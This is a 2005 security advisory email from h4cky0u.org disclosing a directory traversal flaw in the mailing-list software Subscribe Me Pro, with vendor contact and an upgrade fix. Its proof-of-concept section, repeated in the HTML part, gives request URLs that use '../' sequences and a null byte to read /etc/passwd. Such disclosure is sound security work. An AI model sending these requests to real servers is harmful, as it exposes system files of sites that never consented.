subpro204409P.txt

`------=_Part_563_26909740.1126618894612  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
------------------------------------------------------  
HYA-2005-006 h4cky0u.org <http://h4cky0u.org> Advisory 007  
------------------------------------------------------  
Date - Tue Sep 13 2005  
  
  
TITLE:  
=3D=3D=3D=3D=3D=3D  
  
Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability  
  
  
SEVERITY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
High  
  
  
SOFTWARE:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Subscribe Me Pro 2.044.09P and prior  
  
Support Website : http://siteinteractive.com/subpro/  
  
  
INFO:  
=3D=3D=3D=3D=3D  
  
Subscribe Me Professional is designed to assist with the building,=20  
maintaining, mailing, and tracking of your customer/prospect mailing lists.  
  
  
BUG DESCRIPTION:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal=20  
vulnerability. This issue is due to a failure in the application to properl=  
y=20  
sanitize user-supplied input. An unauthorized user can retrieve arbitrary=  
=20  
files by supplying directory traversal strings '../' to the vulnerable=20  
parameter.  
  
  
POC:  
=3D=3D=3D=3D  
  
Here are some examples:  
  
http://www.site.com/[dir]/s.pl?e=3D1&subscribe=3Dsubscribe&l=3D../../../../=  
../../../../etc/passwd%00&SUBMIT=3D%20%20Submit%20%20  
  
http://www.site.com/[dir]/s.pl?e=3Denter%20your%20email%20address%20here&su=  
bscribe=3Dsubscribe&l=3D../../../../../../../../etc/passwd%00  
  
  
VENDOR STATUS:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
Vendor Contact : 13th Sep 2005  
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the=20  
Latest Release : 2.050.01P  
  
  
FIX:  
=3D=3D=3D=3D  
  
Upgrade to version 2.050.01P  
  
  
CREDITS:  
=3D=3D=3D=3D=3D=3D=3D=3D  
  
This vulnerability was discovered and researched by -  
  
ShoCK FX of h4cky0u Security Forums.  
  
  
mail : shockfx at gmail dot com  
  
web : http://www.h4cky0u.org  
  
  
Co Researcher -  
  
h4cky0u of h4cky0u Security Forums.  
  
  
mail : h4cky0u at gmail dot com  
  
web : http://www.h4cky0u.org  
  
  
ORIGINAL ADVISORY:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
  
http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt  
--=20  
http://www.h4cky0u.org  
(In)Security at its best...  
  
------=_Part_563_26909740.1126618894612  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
<div><span class=3D"gmail_quote">  
<p>------------------------------------------------------<br>&nbsp;&nbsp;&n=  
bsp;&nbsp;&nbsp; HYA-2005-006 <a href=3D"http://h4cky0u.org">h4cky0u.org</a=  
> Advisory 007<br>------------------------------------------------------<br=  
>Date - Tue Sep 13 2005  
</p>  
<p><br>TITLE:<br>=3D=3D=3D=3D=3D=3D</p>  
<p>Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability</=  
p>  
<p><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>  
<p>High</p>  
<p><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>  
<p>Subscribe Me Pro 2.044.09P and prior</p>  
<p>Support Website : <a href=3D"http://siteinteractive.com/subpro/">http://=  
siteinteractive.com/subpro/</a></p>  
<p><br>INFO:<br>=3D=3D=3D=3D=3D</p>  
<p>Subscribe Me Professional is designed to assist with the building, maint=  
aining, mailing, and tracking of your customer/prospect mailing lists.</p>  
<p><br>BUG DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
</p>  
<p>Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal =  
vulnerability. This issue is due to a failure in the application to properl=  
y sanitize user-supplied input. An unauthorized user can retrieve arbitrary=  
files by supplying directory traversal strings '../' to the vulnerable par=  
ameter.  
</p>  
<p><br>POC:<br>=3D=3D=3D=3D</p>  
<p>Here are some examples:</p>  
<p><a href=3D"http://www.site.com/[dir]/s.pl?e=3D1&subscribe=3Dsubscrib=  
e&l=3D../../../../../../../../etc/passwd%00&SUBMIT=3D%20%20Submit%2=  
0%20">http://www.site.com/[dir]/s.pl?e=3D1&subscribe=3Dsubscribe&l=  
=3D../../../../../../../../etc/passwd%00&SUBMIT=3D%20%20Submit%20%20  
</a></p>  
<p><a href=3D"http://www.site.com/[dir]/s.pl?e=3Denter%20your%20email%20add=  
ress%20here&subscribe=3Dsubscribe&l=3D../../../../../../../../etc/p=  
asswd%00">http://www.site.com/[dir]/s.pl?e=3Denter%20your%20email%20address=  
%20here&subscribe=3Dsubscribe&l=3D../../../../../../../../etc/passw=  
d%00  
</a></p>  
<p><br>VENDOR STATUS:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>  
<p>Vendor Contact : 13th Sep 2005<br>Vendor Reply : 13th sep 2005 - This Vu=  
lnerability has been fixed in the Latest Release : 2.050.01P</p>  
<p><br>FIX:<br>=3D=3D=3D=3D</p>  
<p>Upgrade to version 2.050.01P</p>  
<p><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D</p>  
<p>This vulnerability was discovered and researched by -</p>  
<p>ShoCK FX of h4cky0u Security Forums.</p>  
<p><br>mail : shockfx at gmail dot com</p>  
<p>web : <a href=3D"http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>  
<p><br>Co Researcher -</p>  
<p>h4cky0u of h4cky0u Security Forums.</p>  
<p><br>mail : h4cky0u at gmail dot com</p>  
<p>web : <a href=3D"http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>  
<p><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D</p>  
<p><a href=3D"http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-p=  
ro.txt">http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt=  
</a></p></span>-- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u=  
.org  
</a><br>(In)Security at its best... </div>  
  
------=_Part_563_26909740.1126618894612--  
`